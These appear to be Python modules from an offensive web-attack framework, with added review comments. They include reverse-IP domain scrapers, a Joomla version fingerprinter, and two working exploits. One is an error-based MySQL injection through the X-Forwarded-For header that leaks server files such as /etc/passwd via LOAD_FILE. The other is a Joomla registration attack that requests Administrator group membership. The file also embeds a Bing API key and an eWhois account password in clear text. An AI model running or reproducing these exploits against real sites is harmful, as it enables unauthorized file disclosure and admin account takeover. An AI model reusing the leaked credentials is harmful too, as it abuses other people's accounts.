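def Whoiswebhosting(self, searcher):
    """Collect the domains hosted on ``self.ip`` from whois.webhosting.info.

    ``searcher['URL']`` is a format string taking ``(ip, page_index)``.  The
    first page is fetched with ``pi=1``; the page's "Last" link tells how many
    pages exist.  Every page is grepped for the
    ``<td><a href="http://whois.webhosting.info/...">domain.</a></td>`` cells
    (the capture group drops the trailing dot) and the names are appended to
    ``self.domains``; a status line with the count is printed through
    ``self.frmwk``.  Paging stops early when the site answers with its
    anti-automation ("security key") page, since nothing after that is data.
    """
    req = HTTP(searcher['URL'])
    domain_re = r'<td><a href="http:\/\/whois\.webhosting\.info\/.*?\.">(.*?)\.<\/a><\/td>'
    # NOTE(review): this pattern looks as if HTML entities (&nbsp; / &gt;) were
    # decoded at some point ("\ \;" matches a literal space + ';').  Verify it
    # against a live page before relying on multi-page results.
    last_re = r'\?pi=([0-9]+)\&ob=SLD\&oo=DESC">\ \;\ \;Last\ \;>\>\;<\/a>'

    data = req.Request(searcher['URL'] % (self.ip, 1))
    urls = findall(domain_re, data)

    last = search(last_re, data)
    if last:
        # The first request already used pi=1, so page indexes are 1-based and
        # the "Last" index is a real page that must be fetched too.  The
        # original range(2, last) silently dropped that final page.
        last_page = int(last.group(1))
        for page in range(2, last_page + 1):
            data = req.Request(searcher['URL'] % (self.ip, page))
            if search('The security key helps us prevent automated searches', data):
                # CAPTCHA wall: stop paging, keep what was collected so far.
                break
            urls += findall(domain_re, data)

    self.frmwk.print_status(self.fmt_string.format(searcher['SITE'], len(urls)))
    self.domains += urls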
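def BingApi(self, searcher):
    """Collect the domains on ``self.ip`` through the legacy Bing XML API.

    ``searcher['URL']`` is a format string taking ``(api_key, ip, page)``.
    The first call (page 0) is parsed for ``<web:Total>`` to size the result
    set; the remaining pages (50 hits each) are concatenated onto the same
    buffer and every ``<web:Url>`` is reduced to its host part before being
    appended to ``self.domains``.
    """
    # SECURITY: an API key is committed in clear text.  Anyone with the source
    # can burn this key's quota; rotate it and load it from configuration
    # (this file already keeps settings on CONFIG) instead of the repository.
    KEY = "49EB4B94127F7C7836C96DEB3F2CD8A6D12BDB71"
    req = HTTP(searcher['URL'])
    data = req.Request(searcher['URL'] % (KEY, self.ip, 0))

    total_match = search(r'<web:Total>([0-9]+)<\/web:Total>', data)
    if total_match is None:
        # No <web:Total> is an error/quota/invalid-key page, not "zero hits".
        # The original dereferenced .group(1) here and died with AttributeError
        # (masked by the caller's blanket except).
        self.frmwk.print_error(
            '%s : no <web:Total> in response (invalid key or quota exceeded?)'
            % searcher['SITE'])
        return

    # 50 results per page; page 0 is already in `data`.
    pages = int(int(total_match.group(1)) / 50 + 1)
    for page in range(1, pages):
        data += req.Request(searcher['URL'] % (KEY, self.ip, page))

    # 'scheme://host/path'.split('/', 3)[2] -> 'host'
    urls = [hit.split('/', 3)[2] for hit in findall(r'<web:Url>(.+?)<\/web:Url>', data)]
    self.frmwk.print_status(self.fmt_string.format(searcher['SITE'], len(urls)))
    self.domains += urls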
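class Module(Templates):
    """Error-based MySQL injection through the ``X-Forwarded-For`` header.

    The target's login handler presumably interpolates the
    ``X-Forwarded-For`` value into a query.  The payload uses the
    ``count(*) ... group by concat(floor(rand(0)*2), <data>)`` duplicate-key
    trick: MySQL fails with ``Duplicate entry '<0|1><data>' for key ...`` and
    the error text leaks 62 characters of ``LOAD_FILE(FILE)`` per request.
    Chunks are written straight to stdout until a request produces no
    duplicate-entry error (end of file, or the injection stopped working).
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.version = 1
        self.author = ['Kid']
        # The original metadata ("Get Basic Meter Information By Reading
        # Tables") described a different module; this is what the code does.
        self.description = 'Read a server-side file via error-based SQL injection in the X-Forwarded-For header'
        self.detailed_description = (
            'This module injects into the X-Forwarded-For header of the login '
            'request and abuses a MySQL duplicate-key error to leak the content '
            'of LOAD_FILE(FILE) 62 characters at a time, printing it to stdout.')
        # FILE is operator input and is spliced into the SQL payload unescaped:
        # a single quote in it breaks the injection.
        self.options.addString('FILE', 'server-side file to read with LOAD_FILE()', default='/etc/passwd')

    def run(self, frmwk, args):
        # NOTE(review): the target is hard-coded to www.google.com, clearly a
        # placeholder left from development.  The other modules in this file
        # take the target from self.options['URL']; this one should too.
        url = 'http://www.google.com/'
        self.victim = HTTP(url)
        chunk = 62          # characters leaked per request (MySQL substring length)
        offset = 1          # MySQL substring() positions are 1-based
        login_body = "uname=administrator&upass=12345612345&Submit=+++Login+++"
        payload = ("1' order by (SELECT 1 from (select count(*),concat(floor(rand(0)*2),"
                   "(substring((select(LOAD_FILE('%s'))),%s,%s)))a from information_schema.tables "
                   "group by a)b);-- -'")
        while True:
            header = {'x-forwarded-for': payload % (self.options['FILE'], offset, chunk)}
            data = self.victim.Request(url, 'POST', login_body, header=header)
            # The leaked chunk is prefixed by the floor(rand(0)*2) digit (0 or 1);
            # the single '.' in the pattern skips it.
            res = search("Duplicate entry '.(.*?)' for key ", data, DOTALL)
            if not res:
                break
            stdout.write(res.group(1))
            stdout.flush()
            offset += chunk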
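def run(self, frmwk, args):
    """Register an account on a Joomla ``com_users`` form while requesting group 7.

    Flow (all against ``self.options['URL']``):

    1. GET the registration page and extract the 32-char CSRF token
       (``name="<token>" value="1"``); the session cookie is kept.
    2. POST a deliberately invalid registration (mismatched passwords) that
       also carries ``jform[groups][]=7``.
    3. POST the real registration for a random ``self.username`` and the
       fixed ``self.password`` with the configured Gmail address
       (``CONFIG.GMAIL_ACCOUNT[0]``).
    4. Read the page's ``warning``/``message`` block for the outcome; on
       success wait 30 s, poll ``self.getMail()`` for the activation link and
       follow it.

    Group id 7 is the Administrator group on a default Joomla install —
    confirm for the target.  The registered credentials are printed in clear.
    """
    url = self.options['URL']
    email = CONFIG.GMAIL_ACCOUNT[0]
    self.username = '******' + str(randint(1000, 100000))
    self.password = '******'
    victim = HTTP(url)
    victim.storecookie = True  # token and session must survive across the POSTs

    exploit = 'jform%5Bname%5D=exploit&jform%5Busername%5D=exploit&jform%5Bpassword1%5D=123123&jform%5Bpassword2%5D=1231233&jform%5Bemail1%5D=pentest%40yahoo.com&jform%5Bemail2%5D=pentest%40yahoo.com&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&'
    # NOTE(review): `email` is spliced into the form body without URL-encoding;
    # works for plain addresses but any reserved character would corrupt it.
    registry = 'jform%5Bname%5D={0}&jform%5Busername%5D={0}&jform%5Bpassword1%5D={1}&jform%5Bpassword2%5D={1}&jform%5Bemail1%5D={2}&jform%5Bemail2%5D={2}&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&'.format(self.username, self.password, email)

    frmwk.print_status('Init token')
    data = victim.Request(url)
    token = search(r'name="([a-zA-Z0-9]{32})"\svalue="1"', data)
    token = token.group(1) if token else ''

    frmwk.print_status('Send false request')
    url = url + '?task=registration.register'
    victim.Request(url, 'POST', exploit + token + '=1')

    frmwk.print_status('Send exploit request')
    data = victim.Request(url, 'POST', registry + token + '=1')
    warning = search(r'class="warning\smessage">(.*?)</dd>', data, DOTALL)
    message = search(r'class="message\smessage">(.*?)</dd>', data, DOTALL)
    if warning:
        frmwk.print_error('Error during exploit : ' + warning.group(1))
        return
    elif message:
        frmwk.print_success('Successful : ' + message.group(1).strip())
        frmwk.print_success('Account login: %s | %s' % (self.username, self.password))
    else:
        # Vietnamese "Hên xui" ("luck of the draw"): neither block was found,
        # so the outcome is unknown.  Literal kept as in the original.
        frmwk.print_status('HĂȘn xui !')

    frmwk.print_status('Sleep 30s for mail receiver !')
    sleep(30)
    # The original left this unbound when no mail matched -> UnboundLocalError.
    active_link = None
    for mail in self.getMail():
        active = search(r'(http(.*?)activate&token=(.*?))\s', mail['body'], DOTALL)
        if active:
            active_link = active.group(1)
            frmwk.print_status('Active link: ' + active_link)
            break
    if not active_link:
        frmwk.print_status('No activation link found in received mail')
        return
    data = victim.Request(active_link)
    message = search(r'class="message\smessage">(.*?)</dd>', data, DOTALL)
    if message:
        frmwk.print_success('Actived\nAccount: %s | %s' % (self.username, self.password))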
def eWhois(self, searcher):
    """Collect the domains on ``self.ip`` from the eWhois IP-address export.

    Logs in first (cookies kept on the session, randomized user agent turned
    off), downloads ``/export/ip-address/<ip>/`` and pulls the first CSV
    column of every matching row, appending the names to ``self.domains``.
    """
    # SECURITY: account credentials are embedded in the source.  They belong
    # in configuration (this file already keeps secrets on CONFIG, e.g.
    # CONFIG.GMAIL_ACCOUNT) and the committed password must be considered
    # burned.
    login_form = urlencode({
        '_method': 'POST',
        'data[User][email]': '*****@*****.**',
        'data[User][password]': 'RitX:::R1tX',
        'data[User][remember_me]': '0',
    })
    session = HTTP("http://www.ewhois.com/")
    session.storecookie = True
    session.rand_useragent = False
    # The login response is not inspected; a failed login presumably just
    # yields an export with no rows.
    session.Request('http://www.ewhois.com/login/', 'POST', login_form)
    export = session.Request("http://www.ewhois.com/export/ip-address/%s/" % self.ip)
    # NOTE(review): the `[UA\-[0-9]+\-[0-9]+|]` part is a character class, not
    # an alternation — it looks mangled; verify against a current export.
    found = findall(r'"(.*?)","","","[UA\-[0-9]+\-[0-9]+|]",""', export)
    self.frmwk.print_status(self.fmt_string.format(searcher['SITE'], len(found)))
    self.domains += found
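def reverseip(self, searcher):
    """Run one reverse-IP source described by ``searcher`` and collect its domains.

    ``searcher`` keys: ``SITE`` (label), ``URL`` (format string taking the IP,
    or a plain URL when ``DATA`` is present), optional ``DATA`` (POST body
    format string taking the IP), ``REGEX`` (pattern whose matches are the
    domains) and optional ``SP`` — a callable taking ``searcher`` that
    replaces the generic fetch-and-grep path (e.g. ``Whoiswebhosting``,
    ``BingApi``, ``eWhois``).

    A failing source never aborts the scan, but the failure is now reported
    through ``self.frmwk.print_error`` instead of being swallowed by a bare
    ``except: pass`` (which hid real bugs in the special-purpose handlers).
    """
    try:
        if 'SP' in searcher:
            searcher['SP'](searcher)
            return
        req = HTTP(searcher['URL'])
        if 'DATA' in searcher:
            data = req.Request(searcher['URL'], 'POST', searcher['DATA'] % self.ip)
        else:
            data = req.Request(searcher['URL'] % self.ip)
        urls = findall(searcher['REGEX'], data)
        self.frmwk.print_status(self.fmt_string.format(searcher['SITE'], len(urls)))
        self.domains += urls
    except Exception as e:
        # Best effort: keep scanning the other sources, but say what broke.
        self.frmwk.print_error('%s : %s' % (searcher.get('SITE', '?'), e))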
class Searcher(Thread):
    """Paged search worker: fetches result pages for one keyword in a thread.

    Subclasses provide the site-specific hooks used here but not defined on
    this class: ``uriCreater()`` (URL of the current page, built from
    ``self.keyworld`` / ``self.count``), ``Has_Next(data)``, ``Getdata(data)``
    (raw result entries of a page) and ``Spliter(entry)`` (one parsed record).
    Parsed records accumulate in ``self.info``.
    """

    def __init__(self, host, keyworld, limit, delay):
        super().__init__()
        self.keyworld = quote_plus(keyworld)   # pre-encoded for uriCreater()
        self.limit = limit                     # stop once self.count reaches this
        self.delay = delay                     # seconds to sleep between pages
        self.request = HTTP(host, CONFIG.TIME_OUT, user_agents_type='bot')
        self.count = 0                         # result offset of the current page
        self.info = []
        self.step = 10                         # page size; replaced by the real count

    def run(self):
        """Thread body: walk result pages until the site or the limit says stop."""
        while True:
            printer.print_line('\t{0:<25} {1:d}'.format(self.name, self.count))
            page = self.do_search(self.uriCreater())
            # NOTE(review): `self.count <= 1` holds on the very first pass
            # (count starts at 0) unless a hook changes count, so as written
            # the loop ends after one page — confirm whether `self.step` was
            # the intended check.
            if not self.Has_Next(page) or self.count <= 1:
                break
            self.count += self.step
            if self.count >= self.limit:
                break
            sleep(self.delay)

    def do_search(self, uri):
        """Fetch one page and feed it to do_split(); return the raw page, '' on parse failure."""
        page = self.request.Request(uri)
        if page == '':
            return page
        try:
            entries = self.Getdata(page)
        except Exception:
            printer.print_error('%s : Nothing to do !' % self.name)
            return ''
        self.do_split(entries)
        return page

    def do_split(self, info):
        """Parse every raw entry with Spliter(); report and skip the ones that fail."""
        parsed = []
        for entry in info:
            try:
                parsed.append(self.Spliter(entry.strip()))
            except Exception as e:
                printer.print_error('%s Error : %s\ncontent: %s' % (self.name, e, entry))
        self.info += parsed
        self.step = len(parsed)
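def run(self, frmwk, args):
    """Fingerprint a Joomla installation's version from static files.

    Each entry of the table below names a file shipped with Joomla and a list
    of ``(marker, version_range)`` pairs (the SVN revision/timestamp strings
    found in that file per release, taken from pepelux's joomlascan).  Files
    are fetched in order under ``self.options['URL']``; on an HTTP 200 the
    first marker present in the body decides ``self.version`` and the scan
    stops.  If no marker matches, ``language/en-GB/en-GB.xml`` and
    ``components/com_mailto/mailto.xml`` are tried for a literal
    ``<version>`` element.

    The marker table only covers Joomla 1.0.x–1.7.5; newer installs will
    normally be resolved (if at all) by the XML fallback.  A site that
    answers every path with a 200 "not found" page simply produces no match.
    """
    self.version = None
    url = self.options['URL']
    if not url.endswith('/'):
        url += '/'

    ###### dict from http://www.pepelux.org/programs/joomlascan/ #######
    # Order matters: the first marker found in a file wins.
    storeversion = [
        ['language/en-GB/en-GB.ini', [
            ['version 1.5.x 2005-10-30 14:10:00', '1.5.0.Beta-1.5.0.Beta'],
            ['9913 2008-01-09 21:28:35Z', '1.5.0.Stable-1.5.0.Stable'],
            ['9990 2008-02-05 21:54:06Z', '1.5.1.Stable-1.5.1.Stable'],
            ['10053 2008-02-21 18:57:54Z', '1.5.2.Stable-1.5.2.Stable'],
            ['10208 2008-04-17 16:43:15Z', '1.5.3.Stable'],
            ['10498 2008-07-04 00:05:36Z', '1.5.4.Stable-1.5.7.Stable'],
            ['11214 2008-10-26 01:29:04Z', '1.5.8.Stable-1.5.8.Stable'],
            ['11391 2009-01-04 13:35:50Z', '1.5.9.Stable-1.5.11.Stable'],
            ['Copyright (C) 2005 - 2010 Open Source Matters', '1.5.16.Stable-1.5.20.Stable'],
            ['Problem with Joomla site', '1.5.17.Stable-1.5.17.Stable'],
            ['17165 2010-05-17 15:59:19Z', '1.6.0.Beta1-1.6.0.Beta1'],
            ['17420 2010-05-31 11:14:10Z', '1.6.0.Beta2-1.6.0.Beta2'],
            ['17675 2010-06-14 10:20:52Z', '1.6.0.Beta3-1.6.0.Beta3'],
            ['17903 2010-06-28 01:52:11Z', '1.6.0.Beta4-1.6.0.Beta4'],
            ['18082 2010-07-12 01:02:52Z', '1.6.0.Beta5-1.6.0.Beta5'],
            ['18198 2010-07-21 00:58:13Z', '1.6.0.Beta6-1.6.0.Beta8'],
            ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.1.Stable'],
            ['20990 2011-03-18 16:42:30Z', '1.6.2.Stable-1.7.5.Stable'],
        ]],
        ['components/com_contact/metadata.xml', [
            ['8178 2007-07-23 05:39:47Z', '1.5.0.RC2-1.5.18.Stable'],
            ['17437 2010-06-01 14:35:04Z', '1.5.19.Stable-1.5.20.Stable'],
            ['16235 2010-04-20 04:13:25Z', '1.6.0.Stable-1.7.5.Stable'],
        ]],
        ['htaccess.txt', [
            ['47 2005-09-15 02:55:27Z', '1.0.0-1.0.2'],
            ['423 2005-10-09 18:23:50Z', '1.0.3-1.0.3'],
            ['1005 2005-11-13 17:33:59Z', '1.0.4-1.0.5'],
            ['1570 2005-12-29 05:53:33Z', '1.0.6-1.0.7'],
            ['2368 2006-02-14 17:40:02Z', '1.0.8-1.0.9'],
            ['4085 2006-06-21 16:03:54Z', '1.0.10-1.0.10'],
            ['4756 2006-08-25 16:07:11Z', '1.0.11-1.0.11'],
            ['5973 2006-12-11 01:26:33Z', '1.0.12-1.0.12'],
            ['5975 2006-12-11 01:26:33Z', '1.0.13-1.0.14.RC1'],
            ['9317 2007-11-07 03:02:08Z', '1.5.0.RC4-1.5.0.Stable'],
            ['10492 2008-07-02 06:38:28Z', '1.5.0.Beta-1.5.14.Stable'],
            ['13415 2009-11-03 15:53:25Z', '1.5.15.Stable-1.5.15.Stable'],
            ['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable'],
            ['14276 2010-01-18 14:20:28Z', '1.6.0.Beta1-1.6.0.Beta8'],
            ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.1.Stable'],
            ['21101 2011-04-07 15:47:33Z', '1.6.2.Stable-1.7.5.Stable'],
        ]],
        ['administrator/language/en-GB/en-GB.ini', [
            ['version 1.5.x 2005-10-30 14:10:00', '1.5.0.Beta-1.5.0.Beta'],
            ['9869 2008-01-05 04:00:13Z', '1.5.0.Stable-1.5.0.Stable'],
            ['9990 2008-02-05 21:54:06Z', '1.5.1.Stable-1.5.1.Stable'],
            ['10122 2008-03-10 11:58:27Z', '1.5.2.Stable-1.5.2.Stable'],
            ['10186 2008-04-02 13:10:12Z', '1.5.3.Stable-1.5.3.Stable'],
            ['10500 2008-07-04 06:57:07Z', '1.5.4.Stable-1.5.4.Stable'],
            ['10571 2008-07-21 01:27:35Z', '1.5.5.Stable-1.5.7.Stable'],
            ['11213 2008-10-25 12:43:11Z', '1.5.8.Stable-1.5.8.Stable'],
            ['11391 2009-01-04 13:35:50Z', '1.5.9.Stable-1.5.9.Stable'],
            ['11667 2009-03-08 20:32:38Z', '1.5.10.Stable-1.5.10.Stable'],
            ['11799 2009-05-06 02:15:50Z', '1.5.11.Stable-1.5.11.Stable'],
            ['12308 2009-06-23 04:05:28Z', '1.5.12.Stable-1.5.14.Stable'],
            ['13243 2009-10-20 04:01:04Z', '1.5.15.Stable-1.5.15.Stable'],
            ['16380 2010-04-23 09:19:48Z', '1.5.16.Stable-1.5.20.Stable'],
            ['17165 2010-05-17 15:59:19Z', '1.6.0.Beta1-1.6.0.Beta1'],
            ['17387 2010-05-30 16:28:20Z', '1.6.0.Beta2-1.6.0.Beta2'],
            ['17675 2010-06-14 10:20:52Z', '1.6.0.Beta3-1.6.0.Beta3'],
            ['17898 2010-06-27 13:03:01Z', '1.6.0.Beta4-1.6.0.Beta4'],
            ['18090 2010-07-12 10:49:58Z', '1.6.0.Beta5-1.6.0.Beta5'],
            ['18198 2010-07-21 00:58:13Z', '1.6.0.Beta6-1.6.0.Beta6'],
            ['18378 2010-08-09 17:29:44Z', '1.6.0.Beta7-1.6.0.Beta7'],
            ['18572 2010-08-22 09:57:58Z', '1.6.0.Beta8-1.6.0.Beta8'],
            ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.0.Stable'],
            ['20899 2011-03-07 20:56:09Z', '1.6.1.Stable-1.6.1.Stable'],
            ['20990 2011-03-18 16:42:30Z', '1.6.2.Stable-1.6.6.Stable'],
            ['21721 2011-07-01 08:48:47Z', '1.7.0.Stable-1.7.2.Stable'],
            ['22370 2011-11-09 16:18:06Z', '1.7.3.Stable-1.7.5.Stable'],
        ]],
        ['language/en-GB/en-GB.com_media.ini', [
            ['10496 2008-07-03 07:08:39Z', '1.5.0.Beta-1.5.12.Stable'],
            ['12540 2009-07-22 17:34:44Z', '1.5.13.Stable-1.5.14.Stable'],
            ['13311 2009-10-24 04:13:49Z', '1.5.15.Stable-1.5.15.Stable'],
            ['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable'],
            ['17044 2010-05-14 09:52:50Z', '1.6.0.Beta1-1.6.0.Beta3'],
            ['17769 2010-06-20 01:50:48Z', '1.6.0.Beta4-1.6.0.Beta8'],
            ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.6.Stable'],
            ['21660 2011-06-23 13:25:32Z', '1.7.0.Stable-1.7.0.Stable'],
            ['21948 2011-08-08 16:02:50Z', '1.7.1.Stable-1.7.5.Stable'],
        ]],
        ['configuration.php-dist', [
            ['47 2005-09-15 02:55:27Z', '1.0.0-1.0.0'],
            ['217 2005-09-21 15:15:58Z', '1.0.1-1.0.2'],
            ['506 2005-10-13 05:49:24Z', '1.0.3-1.0.7'],
            ['2622 2006-02-26 04:16:09Z', '1.0.8-1.0.8'],
            ['3754 2006-05-31 12:08:37Z', '1.0.9-1.0.10'],
            ['4802 2006-08-28 16:18:33Z', '1.0.11-1.0.12'],
            ['7424 2007-05-17 15:56:10Z', '1.0.13-1.0.15'],
            ['9991 2008-02-05 22:13:22Z', '1.5.0.Stable-1.5.8.Stable'],
            ['11409 2009-01-10 02:27:08Z', '1.5.9.Stable-1.5.9.Stable'],
            ['11687 2009-03-11 17:49:23Z', '1.5.10.Stable-1.5.15.Stable'],
            ['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable'],
        ]],
    ]

    requester = HTTP(url)
    for path, markers in storeversion:
        frmwk.print_status('Checking: ' + url + path)
        data = requester.Request(url + path)
        if requester.response.status == 200:
            for marker, version_range in markers:
                if marker in data:
                    self.version = version_range
                    break
        if self.version:
            break

    if not self.version:
        # Fallback: some manifests state the version outright.
        for path in ('language/en-GB/en-GB.xml', 'components/com_mailto/mailto.xml'):
            frmwk.print_status('Checking: ' + url + path)
            data = requester.Request(url + path)
            if requester.response.status == 200:
                found = search('<version>(.*?)</version>', data)
                if found:
                    self.version = found.group(1)
                    break

    if self.version:
        frmwk.print_success('Found version: ' + self.version)
    else:
        frmwk.print_error('Unknown version !')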